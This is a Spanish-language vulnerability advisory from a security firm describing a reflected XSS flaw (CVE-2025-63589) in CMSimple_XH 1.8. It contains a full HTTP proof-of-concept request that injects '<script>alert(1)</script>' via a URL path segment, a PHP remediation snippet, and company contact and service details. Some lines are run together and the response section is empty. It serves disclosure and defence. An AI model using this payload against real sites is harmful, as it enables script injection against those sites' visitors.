
Prueba de concepto de XSS reflejado para CMSimple_XH 1.8 con inyección de script no autenticada a través de segmentos de ruta no saneados, incluyendo puntuación CVSS 6.1 y ejemplo de remediación en PHP.
Descubierto: 6 de octubre de 2025
Productos: CMSimple_XH (CMS de archivo plano de código abierto)
Versiones afectadas: 1.8
CVE(s): CVE-2025-63589
Autenticación requerida: Ninguna (sin autenticar)
Tipo de ataque: Cross-Site Scripting Reflejado (XSS)
CVSS v3.1 estimado: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio)
El controlador frontal en index.php acepta segmentos de ruta dinámicos (utilizados para enrutar a plantillas/páginas) y pasa esos valores a la representación de la plantilla. El código no sanitiza ni codifica correctamente en HTML estos segmentos de ruta antes de insertarlos en atributos y enlaces href. Como resultado, una URI de solicitud especialmente diseñada que contenga caracteres como "> y etiquetas inyectadas (p. ej. <script>...</script>) se refleja textualmente en la salida HTML y el navegador la ejecuta.
Los puntos de reflexión típicos incluyen:
action de formularios (p. ej., formularios de inicio de sesión/búsqueda)href de elementos de navegación/menú<nav class="locator">)Print view, Sitemap, Login, etc.)Debido a que la entrada termina dentro de contextos de atributos HTML y contenido de anclaje, se requiere codificación estándar de atributos, pero falta.
Solicitud:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

Respuesta:


La carga útil inyectada gjtqw"><script>alert(1)</script>co2cu se refleja sin codificar en enlaces de menú, migas de pan, acción del formulario de búsqueda y enlaces de pie de página, lo que provoca la ejecución del script al renderizar la página.
$safe_segment = rawurlencode($segment); // seguridad de ruta
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)Si tiene preguntas o consultas, no dude en contactarnos.

📞 Tel: 03-6853-5823
📧 Correo electrónico: [email protected]
| Elemento | Contenido |
|---|---|
| Nombre de la empresa | Corporación CyberCrew |
| Dirección | 1-18-13 Sotokanda, Chiyoda-ku, Tokio, Edificio Akihabara Dai, 6.º piso |
Analizamos las vulnerabilidades de la organización desde múltiples perspectivas y proponemos las mejores medidas correctivas.
Cubrimos pruebas dirigidas, basadas en escenarios y pruebas de penetración LLM.
Detectamos tempranamente la filtración de información confidencial y respondemos rápidamente.
Evaluamos la capacidad de defensa basándonos en escenarios de ataque prácticos.
Apoyamos el diseño con seguridad considerada desde las primeras etapas del desarrollo.
🌐 Sitio web oficial: https://www.cybercrew.co.jp
🕒 CyberCrew — Su socio de confianza en seguridad.